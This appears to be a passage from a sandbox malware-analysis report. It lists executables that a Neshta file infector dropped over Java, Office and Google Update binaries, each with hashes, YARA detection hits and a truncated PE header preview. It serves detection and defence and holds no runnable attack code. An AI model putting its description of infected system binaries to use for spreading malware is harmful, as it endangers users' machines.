                                                          SHA-256:06197B71B98A7C4FC08B2B354B6B5DE011BA11CF958827BEE3438B170A27F17F
                                                          SHA-512:008A7A84B3BC2337AF59260348076CDEE1F3C507AD2BF4D2C567029E1F12594555D2BDC4B9BEB2AE77B29E07F7F02158806DB196BB1878D9018E34E7A7757FA1
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateSetup.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.653521772684421
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKEs2WzzIR++tGuPkNoAvBFbq6DAcBDjFsb:sr85C/qLWos+tGEkBbq6D3Bdsb
                                                          MD5:50B7F8BD51D8BEA4542C8B6FB7046568
                                                          SHA1:46FE9571A136EEDD3DC35089F096D47B32EA74C8
                                                          SHA-256:86A782FF58F3B5F1736EF23051833E340FD56A77C1EDDDBA8ECC5A507BA47EE0
                                                          SHA-512:87A46E55F78299DA53343B832D84C81C230D46AEFB71C603998DA5F6D0BB3FFE6FDA5F825F5731F7B810E21C1EF8E9812278D07E7402BB3913AF6DD66DD43CE1
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.330325009255707
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKMmG2haDkdWIJ7OkUVS:sr85C/qzE+bgOkIS
                                                          MD5:47848F50CD963815CF2894B7C284095C
                                                          SHA1:8F8E03058352E172E9158782BC8E315D026CD720
                                                          SHA-256:115C7F82BED3C1779F50CE53273248152587D8F9421B933C10534B84E16E7815
                                                          SHA-512:9D692E732A6E0F673A2A4ACC6E7877976FCB2901A874D696ADF2A16EB55C08AB738744811AC9A6AFD5673F2FE272E2C6663B6EB123049F41FA5C1E68EBCD5A8E
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javacpl.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.656070779362061
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKKKajo+iKndnTdkCE1A6n82c6jbs2:sr85C/qo0o+iwdnP6ngIs2
                                                          MD5:60628C314BCF2A97CCFA9CB4241A2DAB
                                                          SHA1:6EF748A1568A9AE0D541C5CDF0F74430A59E4DE5
                                                          SHA-256:FD8BD222DB055C39D6050A10F91EEE576ADDFC37CE78F585ACC48F96E222FA90
                                                          SHA-512:2AC9ED50008A13A4255ABB338C675D53688D321E6086B6DF17B02A3F89896051F60E8565001CE0B7BCEBD0CD211DED9B9574347BC95A05922700C20806EC93EC
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaws.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.6397427450636055
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJC/rmKHLgwHz2xi03XxQy012eqZwE:sr85C/qMsc2Y03BQz2eqZP
                                                          MD5:7132D6785E73B1159F3AC9AC5DE71A1C
                                                          SHA1:0EF8C262E63E3776662064D00E5C4264D0213C8B
                                                          SHA-256:629945249C52DDB4108FF5C239D4E2C79C92A545ECD25DAE395697831D648A5F
                                                          SHA-512:804BD2E14C52D226F1D470D0C73B3DE7945EA24EA4554D916FF796E24F6C7C6B5A21284396C6359CBD94ACCE87517D19984F207FEED537AE9DDE8C29D04D2A9E
                                                          Malicious:true
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.346606571165856
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCOLIFaIz9SEhJyurf6S1TWfavAd3VbB:sr85Cb7hfFTkd33
                                                          MD5:95ED8DD6C4D471F68911840679CA1F9B
                                                          SHA1:5BDD0A4778F72B6AC95FEEFF108F74E342981690
                                                          SHA-256:82B98FAF27483CB4C8957A2BC6306C47D59559046C8DCDC03C708C77C36E2417
                                                          SHA-512:581BD049EDCEC4E330FEC670AF7B2980F1B338FC8588B596555803A43B0BE4232A3376CB314C8F3C9DC615D892D80746EB2E1C60766BDB7E046515DB9751DD8B
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\jp2launcher.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.107296013528715
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCWnoDdvhQBW1kqanjaYt6Zs8:sr85CaEQQhanIZs8
                                                          MD5:4141A0DE0BCBE19FA9E93DB323462679
                                                          SHA1:88F7E506A247D882C4F4E924D1E3DAB0FC077387
                                                          SHA-256:3CD849C610540723B3785865DFCC8F65B820003251B39ED6594A8A979F20E948
                                                          SHA-512:940ED87A4C20AE138D388D2324AEBCCA2FC4C93B8D8C2443E91EB382937F79B55BDAD03F595C4EF3FA94D0EC087EA3C228ABB143BBCB79C554E5C3FA38CAA754
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\ssvagent.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.242980084696127
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCZqO55PvVT4zHu+wLZ8qU:sr85CIO55PvV8HVwLZ8qU
                                                          MD5:18E80CD6901FFDEDD81B44D0526240D4
                                                          SHA1:640A66FC69235A0B3677A010376FC607CC2B50E6
                                                          SHA-256:3A70FBA9C369E6FC2DB35AF45D1201833ADEB33B1ACE24603A582D2BACE6ACDF
                                                          SHA-512:4F62E2168BFCFD0329F12F93FB5783B9D70989852CF9C12339FDED1ACC5C984FCC847555DD223C6EE2C3CEF64DD95F580DB31138F9D2F47E68FF2F6106A3BED3
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\unpack200.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.2705620011183765
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCFtwbWR/v1o/G42UR9whwRrcUTR9EhhBhc:sr85CpnD9UR9whwtvTRMBy
                                                          MD5:F56F560D473A7660D3AD44E731930A06
                                                          SHA1:B71090C328FF4234B213D76689591DE15DEBD0F3
                                                          SHA-256:9B7384DC0D5DBA8C5161DB5C42D3075A4281716F741F10DEF974C5C680308CD0
                                                          SHA-512:0134B6C093C053343177A83B81A23EEE54BF4C655958906B854B221B85097D633FA96953B83343F6C207BE5A15919017EA26C05DD3B46193618FC26510C6E74F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\110\SQLDumper.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):5.110851138659397
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCIbgvgvwvEvFvwYF57LoW8dwhFz7Oos8iwiFT7XMvNvev0vUvZo:sr85CIbMMc4ZTTfRyKFifVlt7wx+oIVg
                                                          MD5:4DA76295D7246E94AC917F192A2ACE84
                                                          SHA1:58964579A019BEAB01488F1B1FD0A83C4A38B0CB
                                                          SHA-256:D1D94327BEFFD6F453E862BFE9B715C980B20F33F38C8825AA2B2DF1DF33F9A5
                                                          SHA-512:8811B0CC2BDE08B9354AC1F84F441F7E3D11A31D7E5D25139E53DA4C2C2E99645A1F37FAA7FD043B4FCC1169DB59FF4F7BA8EAC9CAC14CD455B3CCD34B6BAAD2
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\ACCICONS.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.46960810763993
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCwMkBExFhpgLTGlrFBbeEOCr:sr85CJ7uTGlr3iE5r
                                                          MD5:3AE73C8D42CF093E893717A04A20D5F8
                                                          SHA1:96384CCD613D795E953BFD876250C86007EF74D6
                                                          SHA-256:BAE7AFCEBAEF2A3BB243EFAF1305AED127D21B978D7C4335109F2A403A4C2CE1
                                                          SHA-512:C90A74241A93652AB10BD6E1D476D89C995C7749938B83877C14A8F9496959C8868F21239DC6C468629852D154621E310CA76FB4C50DF8C02626560D48F96E07
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\AppSharingHookController.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.448388258977007
                                                          Encrypted:false
                                                          SSDEEP:768:eyxqjQl/EMQt4Oei7RwsHxyP7nbxzOQdJZyKcXJKtm61b0fth1uvh/NYANLOT9j/:JxqjQ+P04wsmJCRXJQm62t+vTaT9jxd7
                                                          MD5:8BA32D4C4C59A22D2A5A1BEAB8B004C7
                                                          SHA1:AA91417C5BA67F09E743A7740662EED65C4873EA
                                                          SHA-256:2B0E0FBC461BED861EAF961F5058A18252A8A517008660D46063A1DCDF10DD02
                                                          SHA-512:07B9A4827EFDE249FBD6953ABE3559A589500534E8DBAFF12C65EAD40FDE51395822BD265AE48D271ECB825BF6EDEC3D7CB7D2D96FFCBB3AA167FF7FC1A64AF4
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CLVIEW.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.285196024262785
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCVJQEW8SSfaU/VEwdwzfnuktR9KJMkW:sr85CbQE2SkXFKJMt
                                                          MD5:2355BC5DCE8E63203BD523F6A3EF11C9
                                                          SHA1:06E09B957EC99F2635D39BD9D3EF6FB8C26FDD8F
                                                          SHA-256:37D5B62049B2ECBAC53E3126E68E2FA0416A2E220C97E9951BD71FFF52E514A9
                                                          SHA-512:71BCE642EDC4355E8CD217442EE6AEB1AA536069FAACA69633EF3B508A6E523FA2386A7EF841FC84F9EAF475725368DCC2CED0C0D4C13B170EE789A69FFDDCD7
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.72011826313205
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCa9IKr1BRo+SYZMuIb3eJG53B:sr85CaDr1BRo+SYZMuW32GhB
                                                          MD5:BD61FF1B20A7530ECF797894EE1316DC
                                                          SHA1:A9601D8B56C247B801E5D5A89377EEFA6FF37FA2
                                                          SHA-256:29F10DE4B67C8BF585A581AE8893069FA52214A18CC4444D3E207A7A657EBD02
                                                          SHA-512:CD91235FF8ACC7D8263EF05028E728E0BBA90D9459B3FD86568C7149DFF55F1E3E010C5234C234DA87B2CBFBE7B8C71DFEDD9E8C5BB326146579CA9EAD90055F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\DATABASECOMPARE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.169493808225336
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCslMDFepJnQxbMwwNOhO8WSnWR0Oj:sr85CsaeYyiL7WR0k
                                                          MD5:8F4A79DC0DD71E8CA092D84C0260F92D
                                                          SHA1:CEB13BACFAE68CFE94561487FC6E0AE0464C6A58
                                                          SHA-256:2480D138EE436D182337435EF36F9A895ED9A98DA620C752976D575C08ECD390
                                                          SHA-512:A100A527B654FE476672B7809A4C73F8C523C2620815476CF8D994E1553A344CFE4191FDF8641719D52B29743D625574A9287EF51BBF343B5D8FDD428FE68D33
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\SPREADSHEETCOMPARE.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.3186383734960625
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCDnCgs1pSd8MvYMRLWjqov/M:sr85CD+4DFLWjlXM
                                                          MD5:B4F5C898517A6B40402611BF65397423
                                                          SHA1:F6E1F64CA7C05131682153B67E5EF5C54533F1DE
                                                          SHA-256:E634A7EECA5A30B359DD622BA3A3BDBF5729173A416C86C962647B2B7A1F286C
                                                          SHA-512:C510990B72E1FCD1007B38B0A9F4A28280E909D2AC81AE08F106EC482423927EE13081B89DA316D44EDC6FF684C3C3FB93E898705D6D7E7640612560C494E5CA
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\DCF\filecompare.exe, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.392056642854633
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCjCTi/Y5cIzwdi9Jo5wJ8RNjRmBF2XFAkrfkGj:sr85CGT/5Lz8RNIBAXFdrtj
                                                          MD5:77E4E96AC817B6D2DCC671C75B3AF7D5
                                                          SHA1:2B3C254A156F9CD60BD9EF5B5832C7BC8F7FF9E2
                                                          SHA-256:657B05CB38BED57B93383818722F9058FED9966D1CDA1AB5A00034CB0F6E9A0B
                                                          SHA-512:F4F835B4004C5BF7C7ECB7DF6179EEF8DDDF277B13609A4ABE5AF4A748AD27A6207020E6A9E5301C89C0FF689CFCD99234245BB621CCC94A3E2A9B930DA63B0F
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\FIRSTRUN.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.496755886640026
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCJ5SSe4emv59S7OJvwgUQn73bPrI3SZ:sr85CJte4eK58i6gUQ7LL
                                                          MD5:C5ECA751B54F507CCB797556E24D9EDA
                                                          SHA1:30949D80A7FC4778ACCD14FA9A35B3910F0C96D2
                                                          SHA-256:8F2BF3E7F90A0A85C2B121E448BF1C0BD8B5C8B860E64C1ABF64DBBA8C20111C
                                                          SHA-512:AD1B5E374C615E92EFFD6E789BCFEB99D7DBECBCBB4DA4ABF013DE911E5BA8B6B14F836836EA8EC949F1652ABB29A32204FF5B9BF843C85ACC1453DCAB162C64
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Florian Roth
                                                          • Rule: JoeSecurity_Neshta, Description: Yara detected Neshta, Source: C:\Program Files (x86)\Microsoft Office\Office16\GRAPH.EXE, Author: Joe Security
                                                          Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                                          C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe
                                                          Process:C:\Users\user\Desktop\Z68mMCAxFZ.exe
                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):82944
                                                          Entropy (8bit):6.268163712816429
                                                          Encrypted:false
                                                          SSDEEP:1536:JxqjQ+P04wsmJCdi4v7jFil6gu4ayPdTTFDiopJLN:sr85Cc4vHFs6gu4aCdPFDi2
                                                          MD5:1EF797E5E199041B8A0EB41A50E73185
                                                          SHA1:2D059C707E2738DD623FF8E4D336D8B90B482451
                                                          SHA-256:0BB888F08C57AD222A544EB3A73478B4747059277A80F21A03E5655FA21CE119
                                                          SHA-512:3B08845C01002AF7B35A5BCDCA1D984D7D019EE117F0CB761E3DA608329314067DA1A16ABEBC8AA3FCB602EC58EA77D0F1EE3FC288142DDD0F44970BF431BC77
                                                          Malicious:true
                                                          Yara Hits:
                                                          • Rule: MAL_Neshta_Generic, Description: Detects Neshta malware, Source: C:\Program Files (x86)\Microsoft Office\Office16\IEContentService.exe, Author: Florian Roth
